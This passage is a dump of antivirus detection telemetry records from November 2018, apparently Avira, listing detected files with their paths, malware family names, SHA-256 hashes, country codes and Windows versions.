  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3dcc0f2f4a6c71d24c105c22ea053e1482f419f5aa927888f358eb1c72c564c4', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T03:39:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1b481de0fcc213f8f8a881cc26e76c0310da9b046ed365460119fa90cfee23c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:00:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupdatamngr_ilivid.exe', filepath='\\\\?\\C:\\Windows\\Temp\\26045bc1\\SetupDataMngr_iLivid.exe', filesize=8680000, name='PUA/iLivid.iona.#M1.#R1'), hash='3ad255e09ca657043a4d99ae2e7d869dd8fa42e691f44d22b1c11364730eaa40', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:07:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T23:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0118534.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0118534.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ndp46-kb3045557-x86-x64-allos-enu.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045557-x86-x64-AllOS-ENU.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='52d8475c5be4f6e846c1f874db950e23ed62d61eab5235715fdaf5b4917ada19', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053203-9952527c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053203-9952527C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140505-eafbb891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140505-EAFBB891', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:08:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194854-8a85e136', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d16213b8\\AVSCAN-20181102-191907-E47D0A4D\\AVSCAN-20181102-194854-8A85E136', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:48:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091937-c74ba9c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-091923-C492D15E\\AVSCAN-20181102-091937-C74BA9C6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:19:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094908-c8b17687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e6c0539c\\AVSCAN-20181102-094820-BFC314E8\\AVSCAN-20181102-094908-C8B17687', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054220-08f70d4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054220-08F70D4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061223-3c18a484', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061223-3C18A484', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050246-822693c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050246-822693C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba7a4d5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA7A4D5A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161122-6af77279', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-161122-6AF77279', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp2_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp2_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T05:11:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-222217-3dcca726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c360177\\AVSCAN-20181101-221828-29DFCA14\\AVSCAN-20181101-222217-3DCCA726', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054226-0cd8de2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054226-0CD8DE2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053931-a436d1f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053931-A436D1F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061218-38e17896', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061218-38E17896', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051540-4fbf80f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051540-4FBF80F1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5236.19574\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa5236.19574\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:31:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055226-72a597c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055226-72A597C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141356-cf0690ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8aa54411\\AVSCAN-20181102-141259-C57AD004\\AVSCAN-20181102-141356-CF0690CE', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053110-7a230481', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053110-7A230481', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145105-ebe2bc37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145105-EBE2BC37', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055232-75dfaefe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055232-75DFAEFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062022-5987bebf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062022-5987BEBF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050945-7be030d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050945-7BE030D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052439-90d1e633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052439-90D1E633', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d0b4e1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D0B4E1C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060242-e1c7114a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060242-E1C7114A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054005-b8b64616', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054005-B8B64616', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054621-98f21898', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054621-98F21898', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061910-2e4bc51c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061910-2E4BC51C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055540-e609f5e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055540-E609F5E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060854-bf817902', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060854-BF817902', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060838-b5fb2868', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060838-B5FB2868', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061046-022ab3b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061046-022AB3B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055534-e2a7d518', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055534-E2A7D518', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051319-fb8ee949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051319-FB8EE949', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060400-101036bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060400-101036BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054937-0dd07175', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054937-0DD07175', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051033-9846e6cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051033-9846E6CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055011-21c0e0be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055011-21C0E0BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050910-675c709b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050910-675C709B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053642-3f7cf848', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053642-3F7CF848', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062624-3154ce04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062624-3154CE04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:23Z'), dt=datetime.date(2018, 11, 2)),
